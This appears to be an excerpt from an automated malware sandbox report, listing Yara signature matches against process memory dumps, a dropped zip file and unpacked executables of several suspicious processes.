Source: Yara match File source: 00000007.00000003.2416630360.0000000005F11000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000016.00000003.2418840174.0000000005FFF000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: hvkESMr10WtP7_E6btIJmDx0.exe PID: 7700, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: ZzpT5hwyVjlAXfLjB1r1iwOX.exe PID: 7744, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: rYuCm9r3mZzk_0VrthAnPu8c.exe PID: 7824, type: MEMORYSTR
Source: Yara match File source: C:\Users\user\AppData\Local\Temp\Jl9_JMpull8yLuWoc7AXV8O.zip, type: DROPPED
Source: Yara match File source: 00000031.00000002.3127540718.00000000009C4000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000031.00000002.3128895190.0000000000A71000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: softjenimmp3converter.exe PID: 3992, type: MEMORYSTR
Source: Yara match File source: 23.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 21.2.9RJ0JeM9uj2rfsuq_woBmmIY.exe.e2b000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 21.2.9RJ0JeM9uj2rfsuq_woBmmIY.exe.e2b000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 23.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 21.2.9RJ0JeM9uj2rfsuq_woBmmIY.exe.e00000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000015.00000002.1951214705.0000000000E29000.00000004.00000001.01000000.00000012.sdmp, type: MEMORY
Source: Yara match File source: 00000017.00000002.3121845008.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000017.00000002.3132751366.0000000000E81000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: 9RJ0JeM9uj2rfsuq_woBmmIY.exe PID: 7816, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: RegAsm.exe PID: 8000, type: MEMORYSTR
Source: Yara match File source: 8.2.pRIMqfuwRZ49ldgjUZ_z2py6.exe.46a3010.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 8.2.pRIMqfuwRZ49ldgjUZ_z2py6.exe.46a3010.2.raw.unpack, type: UNPACKEDPE